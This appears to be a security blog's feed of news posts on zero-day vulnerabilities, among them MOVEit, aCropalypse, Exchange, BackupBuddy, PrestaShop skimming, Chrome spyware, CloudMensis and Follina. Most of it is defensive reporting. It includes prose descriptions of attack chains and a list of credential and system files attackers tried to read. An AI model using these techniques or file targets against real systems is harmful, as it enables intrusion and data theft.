0-day Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/0-day/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Thu, 28 Dec 2023 22:13:26 +0000 en-US hourly 1 https://wordpress.org/?v=98865 200474804 MOVEit Transfer Fixes a New Critical Vulnerability https://gridinsoft.com/blogs/vulnerability-moveit-transfer/ https://gridinsoft.com/blogs/vulnerability-moveit-transfer/#respond Tue, 11 Jul 2023 12:38:43 +0000 https://gridinsoft.com/blogs/?p=15857 After hundreds of companies were attacked with a 0-day vulnerability in MOVEit Transfer, the developer of this file transfer management product, Progress Software, promised to regularly release patches to provide a “predictable, simple, and transparent bug fixing process.” The first such package included patches for three vulnerabilities, including a critical one. MOVEit Vulnerabilities – The… Continue reading MOVEit Transfer Fixes a New Critical Vulnerability

The post MOVEit Transfer Fixes a New Critical Vulnerability appeared first on Gridinsoft Blog.

]]>
After hundreds of companies were attacked with a 0-day vulnerability in MOVEit Transfer, the developer of this file transfer management product, Progress Software, promised to regularly release patches to provide a “predictable, simple, and transparent bug fixing process.” The first such package included patches for three vulnerabilities, including a critical one.

MOVEit Vulnerabilities – The Post-Factum View

All this story started with a 0-day vulnerability (CVE-2023-34362) in MOVEit Transfer, which was discovered in early June 2023. All versions of MOVEit Transfer were affected by the problem. Researchers say that attacks with the exploitation of this vulnerability began as early as May 27, 2023.

Attackers used this vulnerability to deploy custom web shells on affected servers. This allowed them to list files stored on the server, download them, and steal account credentials and secrets. The latter included the AzureBlobStorageAccount, AzureBlobKey, and AzureBlobContainer settings. To simplify, all the attacks with that vulnerability was in fact a sophisticated SQL injection. The sophistication here is thanks to the unusual way of accessing the database – actually, through the 0-day breach.

As a result, Microsoft analysts linked the massive attacks to the Cl0p ransomware hack group (aka Lace Tempest, TA505, FIN11, or DEV-0950). And soon the hackers began to make demands, extorting ransoms from the affected companies. At the moment, according to Emsisoft experts, the number of companies-victims exceeds 230: at least 20 schools in the US and dozens of universities around the world were affected. In total, the leaks affected information about 17-20 million people.

MOVEit MFT Vulnerabilities Receive a Fix

MOVEit programs will receive service packs from Progress Software, including MOVEit Transfer and MOVEit Automation. The first one alreadyt got a patch that fixes for a critical SQL injection. It also contains fixes for two other, less serious vulnerabilities.

The critical issue has been identified as CVE-2023-36934 by the Trend Micro Zero Day Initiative. The developers report that it can be used without authentication, allowing an attacker to gain unauthorized access to the MOVEit Transfer database.

An attacker could send a specially crafted payload to the MOVEit Transfer application endpoint, which could modify and expose the contents of the MOVEit database.official security bulletin.

There are currently no reports of active exploitation of this breach by hackers. The second vulnerability is also a SQL injection and received the identifier CVE-2023-36932. Hackers actively use this one once they managed to bypass the authentication. Both SQL injections affect multiple versions of MOVEit Transfer, including 12.1.10 and later, 13.0.8 and later, 13.1.6 and later, 14.0.6 and later, 14.1.7 and later, and 15.0.3 and later.

The third issue addressed by patches this month was the CVE-2023-36933 vulnerability. This breach allows attackers to spontaneously terminate a program. Bug persists in MOVEit Transfer versions 13.0.8 and later, 13.1.6 and later, 14.0.6 and later, 14.1.7 and later, and 15.0.3 and later. Company recommends its clients to install updates for their versions, corresponding to the table below.

Vulnerable versions Corrected version Documentation Release Notes
MOVEit Transfer 2023.0.x (15.0.x) MOVEit Transfer 2023.0.4 (15.0.4) MOVEit 2023 Upgrade MOVEit Transfer 2023.0.4
MOVEit Transfer 2022.1.x (14.1.x) MOVEit Transfer 2022.1.8 (14.1.8) MOVEit 2022 Upgrade MOVEit Transfer 2022.1.8
MOVEit Transfer 2022.0.x (14.0.x) MOVEit Transfer 2022.0.7 (14.0.7) MOVEit 2022 Upgrade MOVEit Transfer 2022.0.7
MOVEit Transfer 2021.1.x (13.1.x) MOVEit Transfer 2021.1.7 (13.1.7) MOVEit 2021 Upgrade MOVEit Transfer 2021.1.7
MOVEit Transfer 2021.0.x (13.0.x) MOVEit Transfer 2021.0.9 (13.0.9) MOVEit 2021 Upgrade MOVEit Transfer 2021.0.9
MOVEit Transfer 2020.1.6+ (12.1.6) Special Service Pack available MOVEit Transfer 2020.1SP MOVEit Transfer 2020.1.7
MOVEit Transfer 2020.0.x+ (12.0.x) Update to a supported version Upgrade/Migration Guide N/A

The post MOVEit Transfer Fixes a New Critical Vulnerability appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/vulnerability-moveit-transfer/feed/ 0 15857
The aCropalypse Vulnerability Poses a Threat Not Only to Pixel, but Also to Windows https://gridinsoft.com/blogs/acropalypse-vulnerability-for-windows/ https://gridinsoft.com/blogs/acropalypse-vulnerability-for-windows/#respond Fri, 24 Mar 2023 12:32:48 +0000 https://gridinsoft.com/blogs/?p=13944 Information security experts have discovered that the aCropalypse vulnerability, which allows restoring the original image edited on a Google Pixel device (using the Markup tool), is turning into a 0-day for Windows. Let me remind you that we also wrote that YouTube Video Causes Pixel Smartphones to Reboot, and also that Information Security Specialists Discovered… Continue reading The aCropalypse Vulnerability Poses a Threat Not Only to Pixel, but Also to Windows

The post The aCropalypse Vulnerability Poses a Threat Not Only to Pixel, but Also to Windows appeared first on Gridinsoft Blog.

]]>

Information security experts have discovered that the aCropalypse vulnerability, which allows restoring the original image edited on a Google Pixel device (using the Markup tool), is turning into a 0-day for Windows.

Let me remind you that we also wrote that YouTube Video Causes Pixel Smartphones to Reboot, and also that Information Security Specialists Discovered a 0-day Vulnerability in Windows Search.

Also information security specialists reported that the Google Pixel bug prevented users from calling 911.

It turned out that the aCropalypse bug also works for images cropped using the Windows Snipping Tool, which means that previously deleted content can also be restored for these images.

aCropalypse vulnerability for Windows
Restoring a shaded bank card number

The aCropalypse vulnerability (CVE-2023-21036) was discovered by cybersecurity experts Simon Aarons and David Buchanan. It allows restoring any images modified using the built-in Markup screenshot editor, which appeared on Pixel smartphones in 2018 with the release of Android 9.0 Pie.

In the case of the Pixel, the problem lies in how the image file is opened for editing: the cropped data still remains in the new saved image, allowing about 80% of the original image to be restored.

aCropalypse vulnerability for Windows

The researchers warned that aCropalypse could expose users’ sensitive information if they had once edited an image with Markup and then shared the file with other people or even posted it online.

Because some platforms don’t compress user-uploaded media, the sensitive data contained in the images may have been left untouched and stored somewhere online all these years. In this light, the example given by Aarons with the blurred bank card number shown above is very revealing.

It looks like the aCropalypse issue has gotten a lot worse now, as programmer Chris Blume has discovered that the vulnerability also affects the Windows Snipping Tool.

When you open a file in the Snipping Tool and overwrite the existing file, the same thing happens as in Markup: instead of truncating the unused data, the tool puts the unused data at the end of the file, which eventually allows to partially restore it.

Bleeping Computer and well-known information security expert Will Dormann confirm that the vulnerability actually works in Windows 10 and 11. So, Dormann suggested a simple test: copy any image (to have a backup), then open it with the Snipping Tool ” and crop it to a much smaller size. Save the file and compare the sizes of the cropped and original files. As you can see in the screenshot below, the file sizes are the same.

aCropalypse vulnerability for Windows

Bleeping Computer journalists went even further. They note that the PNG file specification requires that a PNG image file always ends with an “IEND” data fragment, with any data added after it being ignored by image editors and viewers. And unused data remains in the file after IEND.

After all the manipulations described above, the journalists decided to “see” this data.

Since the acropalypse.app online application does not work with Windows files, David Buchanan shared with the publication a Python script that can be used to restore Windows files. The successful result of this script, which the expert does not intend to make public yet, can be seen below.

aCropalypse vulnerability for Windows

It is noted that not all PNG files are affected by this problem, and not all originals for all files can be completely restored.

Your original PNG was saved with one zlib block (usually for “optimized” PNGs), but real screenshots are saved with multiple zlib blocks (which is required for my exploit to work).Buchanan told reporters.

In addition, opening a PNG file in a graphics editor (such as Photoshop) and saving it as another file will delete unused data at the end and cannot be recovered.

It is worth saying that the Snipping Tool works exactly the same with JPG files, saving the “cropped” data when overwritten. However, Buchanan says that his exploit does not yet work with JPGs, although recovery of such images is most likely possible.

Microsoft representatives told the media that they are already aware of this problem. The company is currently investigating the matter, and it promises it will “take steps to protect customers if necessary.”

The post The aCropalypse Vulnerability Poses a Threat Not Only to Pixel, but Also to Windows appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/acropalypse-vulnerability-for-windows/feed/ 0 13944
Another 0-Day Bug Was Found in Microsoft Exchange, and LockBit Ransomware Operators Are Exploiting It https://gridinsoft.com/blogs/0-day-in-microsoft-exchange/ https://gridinsoft.com/blogs/0-day-in-microsoft-exchange/#respond Fri, 14 Oct 2022 09:09:51 +0000 https://gridinsoft.com/blogs/?p=11131 Although Microsoft still hasn’t fixed the ProxyNotShell vulnerabilities found in Exchange last month, the company is now investigating a report of a new 0-day bug that is being used to compromise Exchange servers. Hackers are exploiting this bug to deploy the LockBit ransomware. Let me remind you that we also wrote that ProxyToken Vulnerability Allows… Continue reading Another 0-Day Bug Was Found in Microsoft Exchange, and LockBit Ransomware Operators Are Exploiting It

The post Another 0-Day Bug Was Found in Microsoft Exchange, and LockBit Ransomware Operators Are Exploiting It appeared first on Gridinsoft Blog.

]]>
Although Microsoft still hasn’t fixed the ProxyNotShell vulnerabilities found in Exchange last month, the company is now investigating a report of a new 0-day bug that is being used to compromise Exchange servers. Hackers are exploiting this bug to deploy the LockBit ransomware.

Let me remind you that we also wrote that ProxyToken Vulnerability Allows Stealing Mail Through Microsoft Exchange, and also that FBI removed web shells from vulnerable Microsoft Exchange servers without informing owners.

The South Korean company AhnLab warned that hackers abused another 0-dayvulnerability . Researchers report that they are aware of at least one incident that occurred in July 2022, when attackers used a previously deployed web shell on an Exchange server to elevate privileges to the Active Directory administrator level and hlave stolen 1.3 TB of data and encrypt victim company systems.

Experts who investigated the incident write that it took the attackers just a week to capture the Active Directory administrator account. At the same time, the Exchange server appears to have been compromised using some kind of “undisclosed zero-day vulnerability”, although the victim company received technical support from Microsoft and regularly installed security updates after another compromise that took place in December 2021.

Among the vulnerabilities disclosed after May of this year, there were no reports of vulnerabilities related to the execution of remote commands or the creation of files. So given that the web shell was created on July 21, it looks like the attackers exploited an undisclosed zero-day vulnerability.the experts explain.

At the same time, AhnLab is not sure that the criminals did not exploit the already mentioned ProxyNotShell vulnerabilities, although the attack tactics were completely different.

Perhaps, vulnerabilities in Microsoft Exchange Server (CVE-2022-41040, CVE-2022-41082) discovered by the Vietnamese information security company GTSC on September 28 were used here, but the attack method, the generated web shell file name and subsequent attacks after creation do not match web shell. We believe that other attackers exploited a different zero-day vulnerability.the researchers say.

Although AhnLab experts are not completely sure, it is worth noting that information security specialists are aware of at least three more undisclosed vulnerabilities in Exchange. So, last month, experts from the Zero Day Initiative told Microsoft that they discovered three problems in Exchange at once, which they track under the identifiers ZDI-CAN-18881, ZDI-CAN-18882 and ZDI-CAN-18932. Following this, in early October, Trend Micro added signatures for three critical Microsoft Exchange zero-day vulnerabilities to its N-Platform, NX-Platform, or TPS security products.

So far, Microsoft has not disclosed any information about these three bugs, and they have not yet been assigned CVE IDs.

The post Another 0-Day Bug Was Found in Microsoft Exchange, and LockBit Ransomware Operators Are Exploiting It appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/0-day-in-microsoft-exchange/feed/ 0 11131
0-day Vulnerability in WordPress BackupBuddy Plugin Attacked Over 5 million Times https://gridinsoft.com/blogs/0-day-vulnerability-in-wordpress/ https://gridinsoft.com/blogs/0-day-vulnerability-in-wordpress/#respond Tue, 13 Sep 2022 13:51:26 +0000 https://gridinsoft.com/blogs/?p=10556 Wordfence analysts have discovered that a fresh 0-day vulnerability in the popular WordPress plugin, BackupBuddy, which has been installed about 140,000 times, is under active attack. Since August 26, 2022, there have been about 5,000,000 hack attempts. The BackupBuddy plugin allows users to backup their entire WordPress installation right from the dashboard, including theme files,… Continue reading 0-day Vulnerability in WordPress BackupBuddy Plugin Attacked Over 5 million Times

The post 0-day Vulnerability in WordPress BackupBuddy Plugin Attacked Over 5 million Times appeared first on Gridinsoft Blog.

]]>
Wordfence analysts have discovered that a fresh 0-day vulnerability in the popular WordPress plugin, BackupBuddy, which has been installed about 140,000 times, is under active attack. Since August 26, 2022, there have been about 5,000,000 hack attempts.

The BackupBuddy plugin allows users to backup their entire WordPress installation right from the dashboard, including theme files, pages, posts, widgets, users and media files and so on.

Let me remind you that we also talked about Ukraine Was Hit by DDoS Attacks from Hacked WordPress Sites, and also that About 30% of critical vulnerabilities in WordPress plugins remain unpatched.

The 0-day vulnerability has been identified as CVE-2022-31474 (CVSS 7.5) and affects BackupBuddy versions 8.5.8.0 through 8.7.4.1. The problem was fixed in early September, with the release of version 8.7.5.

The researchers explain that the bug allows unauthorized parties to download arbitrary files from the vulnerable site that may contain sensitive information. It is known that the problem is related to the Local Directory Copy function, which is designed to store a local copy of backups.

This vulnerability allows an attacker to view the contents of any file on the server that your WordPress installation can access. This can be the WordPress wp-config.php file or, depending on the server settings, confidential files such as /etc/passwd.the experts warn.

According to Wordfence, the attacks on CVE-2022-31474 began on August 26, 2022, and since that date, nearly five million hack attempts have been recorded. Most hackers tried to read the following files:

  1. /etc/passwd
  2. /wp-config.php
  3. .my.cnf
  4. .accesshash

BackupBuddy users are now strongly advised to update the plugin to the latest version. If users believe that they may have been compromised, it is recommended to immediately reset the database password, change the WordPress salts and API keys stored in wp-config.php.

The post 0-day Vulnerability in WordPress BackupBuddy Plugin Attacked Over 5 million Times appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/0-day-vulnerability-in-wordpress/feed/ 0 10556
Stores Are under Attack due to 0-Day Vulnerability in PrestaShop https://gridinsoft.com/blogs/0-day-vulnerabilities-in-prestashop/ https://gridinsoft.com/blogs/0-day-vulnerabilities-in-prestashop/#respond Wed, 27 Jul 2022 13:01:34 +0000 https://gridinsoft.com/blogs/?p=9687 Hackers exploit a 0-day vulnerability in the open-source e-commerce platform PrestaShop and introduce web skimmers to websites designed to steal sensitive information. Last Friday, the PrestaShop team issued an urgent warning, urging the administrators of the approximately 300,000 stores using the software to be more vigilant about security as attacks were discovered targeting the platform.… Continue reading Stores Are under Attack due to 0-Day Vulnerability in PrestaShop

The post Stores Are under Attack due to 0-Day Vulnerability in PrestaShop appeared first on Gridinsoft Blog.

]]>
Hackers exploit a 0-day vulnerability in the open-source e-commerce platform PrestaShop and introduce web skimmers to websites designed to steal sensitive information.

Last Friday, the PrestaShop team issued an urgent warning, urging the administrators of the approximately 300,000 stores using the software to be more vigilant about security as attacks were discovered targeting the platform.

Let me remind you that we also wrote that New web skimmer found in Shopify, BigCommerce, Woocommerce and Zencart stores, and also that Dutch shops run out of cheese due to a ransomware attack.

Apparently, the attacks affected PrestaShop version 1.6.0.10 or later, as well as version 1.7.8.2 or later, but only when running a module vulnerable to SQL injection, for example, Wishlist 2.0.0-2.1.0.

We believe that attackers are targeting stores using outdated software and modules, vulnerable third-party modules, or some yet undetected vulnerability.the experts write.

Typically, such attacks start with the hackers sending a POST request to the vulnerable endpoint, followed by a parameterless GET request to the home page, which creates a blm.php file in the root directory. This file is a web shell and allows attackers to remotely execute commands on the server.

In many cases, attackers have been known to use this web shell to inject a fake payment form into the checkout page (web skimmer) and steal customer payment card details. After the attack, the hackers covered their tracks so that the site owner would not realize that the resource had been hacked.

PrestaShop developers say that traces of a compromise can still be found if hackers are not too zealous in destroying evidence. For example, traces of criminals can be found in the web server access logs, file modifications to add malicious code can be seen, as well as the activation of the MySQL Smarty cache, which is part of the attack chain. This feature is disabled by default, but the researchers say the hackers turned it on themselves and recommend removing it altogether if it’s not needed.

All store administrators are advised to install the latest security update (PrestaShop version 1.7.8.7) as soon as possible, as well as they should update all modules used to the latest versions.

At the same time, PrestaShop maintainers emphasize that they discovered and fixed a zero-day vulnerability in the new version, but they “cannot be sure that this is the only way to carry out attacks.” The discovered vulnerability received the identifier CVE-2022-36408.

The post Stores Are under Attack due to 0-Day Vulnerability in PrestaShop appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/0-day-vulnerabilities-in-prestashop/feed/ 0 9687
Chrome 0-day Vulnerability Used to Attack Candiru Malware https://gridinsoft.com/blogs/0-day-vulnerability-in-chrome/ https://gridinsoft.com/blogs/0-day-vulnerability-in-chrome/#respond Mon, 25 Jul 2022 09:24:34 +0000 https://gridinsoft.com/blogs/?p=9615 Avast has discovered that DevilsTongue spyware, created by Israeli company Candiru, exploited a 0-day vulnerability in Google Chrome to spy on journalists and others in the Middle East. The vulnerability in question is the CVE-2022-2294 bug, which was fixed by Google and Apple engineers earlier this month. Let me remind you that we also wrote… Continue reading Chrome 0-day Vulnerability Used to Attack Candiru Malware

The post Chrome 0-day Vulnerability Used to Attack Candiru Malware appeared first on Gridinsoft Blog.

]]>
Avast has discovered that DevilsTongue spyware, created by Israeli company Candiru, exploited a 0-day vulnerability in Google Chrome to spy on journalists and others in the Middle East.

The vulnerability in question is the CVE-2022-2294 bug, which was fixed by Google and Apple engineers earlier this month.

Let me remind you that we also wrote that SpookJS Attack Allows to Bypass Site Isolation In Google Chrome.

The current vulnerability is known to be a heap buffer overflow in the WebRTC component and was first reported by information security expert Jan Vojtěsek from the Avast Threat Intelligence team. Even then, it was known about the exploitation of the bug in real attacks, but no details were disclosed.

As Avast experts now say, the vulnerability was discovered after investigating a spyware attack on one of the company’s customers. According to experts, Candiru started using CVE-2022-2294 back in March 2022, attacking users in Lebanon, Turkey, Yemen and Palestine.

Spyware operators used the standard watering hole tactic for such campaigns. This term refers to attacks that are built by analogy with the tactics of predators who hunt at a watering hole, waiting for prey – animals that have come to drink. This usually means that attackers inject malicious code onto legitimate sites, where it waits for victims.

In this case, by compromising the site, the hackers expected that it would be visited by their targets using a browser vulnerable to CVE-2022-2294. In one case, the website of an unnamed Lebanese news agency was hacked and injected with JavaScript, allowing XXS attacks and redirecting the victim to a server with exploits.

0-day vulnerability in Chrome

The attack was particularly nasty in that it did not require any interaction with the victim (such as clicking on a link or downloading something). To compromise, it was enough to simply open a malicious site in Google Chrome or another Chromium-based browser (including Edge, as well as Safari, since the vulnerability was related to WebRTC).

To make sure they attack only the right people, the hackers created victim profiles by collecting a lot of data, including information about the victim’s system language, time zone, screen size, device type, browser plugins, device memory, cookies, and more.

It is also noted that in the case of the Lebanese attacks, 0-day not only allowed the attackers to execute shellcode inside the rendering process, but was additionally associated with some kind of sandbox escape vulnerability that Avast was unable to recreate for analysis.

When the DevilsTongue malware finally infiltrated the victim’s system, she tried to elevate privileges by installing a Windows driver containing another unpatched vulnerability. Thus, the total number of 0-day bugs involved in this campaign was at least three.

Once the driver was installed, DevilsTongue used a security hole to gain access to the kernel, the most sensitive part of any OS. Researchers call this attack method BYOVD — bring your own vulnerable driver (“bring your own vulnerable driver”). It allows malware to bypass OS protections since most drivers automatically have access to the OS kernel.

We don’t know exactly what the attackers may have been after, but attackers often target journalists to spy on them and the material they are working on, or to get to their sources, as well as to collect compromising evidence and confidential data that they shared with press.Avast experts say.

Let me remind you that the DevilsEye spyware, which was developed by the Israeli company Candiru and then sold to governments of different countries, was described in detail by specialists from Microsoft companies last year. Even then, it was known that politicians, human rights activists, activists, journalists, scientists, embassies and political dissidents in various countries of the world suffer from this malware attack.

The post Chrome 0-day Vulnerability Used to Attack Candiru Malware appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/0-day-vulnerability-in-chrome/feed/ 0 9615
CloudMensis Malware Attacks MacOS Users https://gridinsoft.com/blogs/cloudmensis-malware-for-macos/ https://gridinsoft.com/blogs/cloudmensis-malware-for-macos/#respond Wed, 20 Jul 2022 10:33:14 +0000 https://gridinsoft.com/blogs/?p=9517 ESET experts have discovered the CloudMensis malware, which is used to create backdoors on devices running macOS and subsequently steal information. The malware received its name due to the fact that it uses pCloud, Dropbox and Yandex.Disk cloud storages as control servers. Let me remind you that we also wrote that Vulnerability in macOS Leads… Continue reading CloudMensis Malware Attacks MacOS Users

The post CloudMensis Malware Attacks MacOS Users appeared first on Gridinsoft Blog.

]]>
ESET experts have discovered the CloudMensis malware, which is used to create backdoors on devices running macOS and subsequently steal information.

The malware received its name due to the fact that it uses pCloud, Dropbox and Yandex.Disk cloud storages as control servers.

Let me remind you that we also wrote that Vulnerability in macOS Leads to Data Leakage, and also that Microsoft Releases PoC Exploit to Escape MacOS Sandbox.

The capabilities of CloudMensis indicate that the main goal of its operators is to collect confidential information from infected machines. For example, the malware is capable of taking screenshots, stealing documents, intercepting keystrokes, and compiling lists of emails, attachments, and files stored on removable media.

CloudMensis supports dozens of different commands, which allows its operators to perform a variety of actions on infected machines:

  1. change in the malware configuration the cloud storage provider and authentication tokens, file extensions of interest, the frequency of polling cloud storage, and so on;
  2. make a list of running processes;
  3. to capture the screen;
  4. make a list of letters and attachments;
  5. make a list of files on removable media;
  6. run shell commands and upload the result to the cloud storage;
  7. download and execute arbitrary files.

According to ESET analysis, attackers infected the first Mac as early as February 4, 2022. Since then, they have only occasionally used the backdoor to compromise other machines, hinting at the targeted nature of this campaign.

CloudMensis Malware for macOS

Interestingly, once deployed, CloudMensis is able to bypass the Transparency Consent and Control (TCC) system, which asks the users if they need to grant the app permission to take screenshots or monitor keystrokes. The TCC mechanism is designed to block access to sensitive user data, allowing macOS users to customize privacy settings for various applications and devices (including microphones and cameras).

Rules created by the user are stored in a database protected by System Integrity Protection (SIP), which ensures that only the TCC daemon can modify them. Thus, if a user has disabled SIP on the system, CloudMensis will grant itself the necessary permissions by simply adding new rules to TCC.db.

However, even if SIP is enabled and any version of macOS Catalina prior to 10.15.6 is installed on the machine, CloudMensis can still gain the necessary rights by exploiting a vulnerability in CoreFoundation, which has the identifier CVE-2020-9934 and which Apple fixed two years ago. This bug will force the TCC daemon (tccd) to load a database that CloudMensis can write to.

The vector of infection, as well as the goals of the hackers, are still unknown, but the researchers write that, judging by the way the attackers handle Objective-C, they are practically unfamiliar with macOS. At the same time, experts admit that CloudMensis is still a powerful spy tool that can pose a serious threat to potential victims.

The use of vulnerabilities to bypass defense mechanisms indicates that malware operators are actively trying to maximize the success of their spying operations. At the same time, our study did not find any 0-days used by this group.experts say.

The post CloudMensis Malware Attacks MacOS Users appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/cloudmensis-malware-for-macos/feed/ 0 9517
0-Day Vulnerabilities of 2022 Repeat the Mistakes of Past Years https://gridinsoft.com/blogs/0-day-vulnerabilities-2022/ https://gridinsoft.com/blogs/0-day-vulnerabilities-2022/#respond Tue, 05 Jul 2022 09:54:15 +0000 https://gridinsoft.com/blogs/?p=9158 Google Project Zero researcher Maddie Stone published a study on 0-day vulnerabilities in 2022 on GitHub called “0-day In-the-Wild Exploitation in 2022…so far”. According to Stone, 9 of the 18 exploited zero-day vulnerabilities are variants of previously patched vulnerabilities. In many cases, the attacks were not sophisticated, and the attacker could have exploited the vulnerability… Continue reading 0-Day Vulnerabilities of 2022 Repeat the Mistakes of Past Years

The post 0-Day Vulnerabilities of 2022 Repeat the Mistakes of Past Years appeared first on Gridinsoft Blog.

]]>
Google Project Zero researcher Maddie Stone published a study on 0-day vulnerabilities in 2022 on GitHub called “0-day In-the-Wild Exploitation in 2022…so far”.

According to Stone, 9 of the 18 exploited zero-day vulnerabilities are variants of previously patched vulnerabilities.

Half of the 0-day flaws could have been prevented with more comprehensive fixes and regression tests. In addition, four of the 2022 vulnerabilities are variants of the 2021 0-day bugs.Stone wrote in a blog post.

In many cases, the attacks were not sophisticated, and the attacker could have exploited the vulnerability in another way. For example, the recently discovered Follina vulnerability for Windows (CVE-2022-30190) is a variant of CVE-2021-40444 MSHTML.

Let me remind you that we wrote about Russian Hackers Use Follina Vulnerability to Attack Users in Ukraine, as well as Microsoft Fixed Follina Vulnerability and 55 Other Bugs.

Maddie Stone
Maddie Stone

Many of the zero days of 2022 are due to the fact that the previous vulnerability was not fully fixed. In the case of win32k and Chromium Windows property access interceptor bugs, the flow of execution that was used to test the concept of exploits was fixed, but the root cause problem was not fixed: the attackers were able to go back and activate the original vulnerability. through another path.

And in the case of problems with WebKit and Windows PetitPotam, the original vulnerability was previously fixed, but at some point regressed so that attackers could exploit the same vulnerability again. In iOS, IOMobileFrameBuffer fixed a buffer overflow error by checking if the size is less than a certain number, but not checking the minimum bound of that size.

A researcher on the Google Project Zero blog gave several examples of 0-day vulnerabilities and their associated variants.

0-day vulnerabilities 2022

To properly mitigate zero-day vulnerabilities, Google researchers recommend investing in root cause analysis, options, fixes, and exploits.

Sharing research helps the industry as a whole. We publish our analyses in this repository. We encourage vendors and others to publish them as well. This will allow developers and security professionals to better understand what attackers are already aware of these bugs. Sharing information will lead to better security overall.Stone concluded.

The post 0-Day Vulnerabilities of 2022 Repeat the Mistakes of Past Years appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/0-day-vulnerabilities-2022/feed/ 0 9158
Microsoft Is in No Hurry to Fix the Follina Vulnerability, Which Has Become a Real Disaster https://gridinsoft.com/blogs/microsoft-is-in-no-hurry-to-fix-follina/ https://gridinsoft.com/blogs/microsoft-is-in-no-hurry-to-fix-follina/#respond Thu, 09 Jun 2022 13:35:21 +0000 https://gridinsoft.com/blogs/?p=8384 Hackers are actively exploiting the critical 0-day Follina vulnerability, which Microsoft is in no hurry to fix. Researchers warn that European governments and municipalities in the US have been targeted by a phishing campaign using malicious RTF documents. Let me remind you that the discovery of Follina became known at the end of May, although… Continue reading Microsoft Is in No Hurry to Fix the Follina Vulnerability, Which Has Become a Real Disaster

The post Microsoft Is in No Hurry to Fix the Follina Vulnerability, Which Has Become a Real Disaster appeared first on Gridinsoft Blog.

]]>
Hackers are actively exploiting the critical 0-day Follina vulnerability, which Microsoft is in no hurry to fix.

Researchers warn that European governments and municipalities in the US have been targeted by a phishing campaign using malicious RTF documents.

Let me remind you that the discovery of Follina became known at the end of May, although the first researchers discovered the bug back in April 2022, but then Microsoft refused to acknowledge the problem.

The vulnerability has been tracked under the identifier CVE-2022-30190 and is known to be exploitable to execute arbitrary code through the normal opening of a Word document or preview in File Explorer, resorting to executing malicious PowerShell commands through the Microsoft Diagnostic Tool (MSDT).

The bug affects all versions of Windows that receive security updates, i.e. Windows 7 and later, as well as Server 2008 and later.

Worse, it is noted that the vulnerability is in many ways similar to the PrintNightmare problem, which Microsoft could not fix for quite some time. The fact is that Follina also pulled the discovery of other bugs, the consequences of exploiting which can be no less serious.

We have already written that Chinese hackers are actively using the fresh 0-day, and experts warned that soon there will be more such attacks. Unfortunately, the predictions of the experts turned out to be correct: now Proofpoint analysts report that they have discovered a phishing campaign aimed at government agencies in Europe and municipal authorities in the United States, which in total affected at least 10 of the company’s customers. According to experts, government hackers are behind these attacks.

To deceive potential victims and force them to open a decoy document, the attackers used the theme of a pay increase. Opening the document resulted in the deployment of a Powershell script that checked to see if the system was a virtual machine and was then used to steal information from multiple browsers, email clients, and file services, as well as collect system information, after transferring the data to a server controlled by hackers.

Microsoft is in no hurry to fix Follina

According to Bleeping Computer, the payload collected a lot of data from a wide variety of applications, including:

  1. passwords from browsers: Google Chrome, Mozilla Firefox, Microsoft Edge, Opera, Yandex, Vivaldi, CentBrowser, Comodo, CheDot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc and AVAST Browser;
  2. data from other applications: Mozilla Thunderbird, Netsarang session files, Windows Live Mail contacts, Filezilla passwords, ToDesk configuration file, WeChat, Oray SunLogin RemoteClient, MailMaster, ServU, Putty, FTP123, WinSCP, RAdmin, Microsoft Office, Navicat;
  3. system information: computer information, list of usernames, Windows domain information.

Most of the attacks are reported to have been in the United States, as well as Brazil, Mexico and Russia.

Since there is still no patch for Follina, administrators and users can block attacks on CVE-2022-30190 by disabling the MSDT protocol, which attackers use to launch debuggers and execute code on vulnerable systems. It is also officially recommended to disable file previews in Windows Explorer, because the attack is possible in this way as well.

Mitja Kolsek
Mitja Kolsek

In the absence of an official patch, an unofficial one has already appeared, from 0patch. Let me remind you that 0patch is a platform designed just for such situations, that is, fixing 0-day and other unpatched vulnerabilities, to support products that are no longer supported by manufacturers, custom software, and so on.

Unofficial patches are provided for Windows 11 v21H2, Windows 10 (1803 to 21H2), Windows 7 and Windows Server 2008 R2. Moreover, instead of disabling MSDT recommended by Microsoft, 0patch specialists added additional cleaning of the path provided by the user, which also helps to avoid exploiting the bug.

Please note, it doesn’t matter which version of Office you have installed, or if you have it installed at all. The vulnerability can also be exploited through other attack vectors. That’s why we released a patch for Windows 7 where the ms-msdt: URL handler isn’t registered at all.writes 0patch co-founder Mitya Kolsek.

Meanwhile, information security experts are already beginning to criticize Microsoft for its sluggishness and lack of fixes.

Small security teams generally see Microsoft’s sloppiness as a sign that it’s ‘just another vulnerability,’ but it’s definitely not. It’s not clear why Microsoft continues to downplay this vulnerability, which is already being exploited in real attacks. It definitely doesn’t help the security teams.said Jake Williams, principal cyber threat analyst at Scythe.

The post Microsoft Is in No Hurry to Fix the Follina Vulnerability, Which Has Become a Real Disaster appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/microsoft-is-in-no-hurry-to-fix-follina/feed/ 0 8384
Chinese Hackers Attack Fresh 0-day Follina Vulnerability https://gridinsoft.com/blogs/follina-0-day-vulnerability/ https://gridinsoft.com/blogs/follina-0-day-vulnerability/#respond Fri, 03 Jun 2022 10:32:03 +0000 https://gridinsoft.com/blogs/?p=8270 Experts have warned that Chinese hackers are already actively exploiting a 0-day vulnerability in Microsoft Office known as Follina to remotely execute malicious code on vulnerable systems. Let me remind you that the discovery of Follina became known a few days ago, although the first researchers discovered the bug back in April 2022, but then… Continue reading Chinese Hackers Attack Fresh 0-day Follina Vulnerability

The post Chinese Hackers Attack Fresh 0-day Follina Vulnerability appeared first on Gridinsoft Blog.

]]>
Experts have warned that Chinese hackers are already actively exploiting a 0-day vulnerability in Microsoft Office known as Follina to remotely execute malicious code on vulnerable systems.

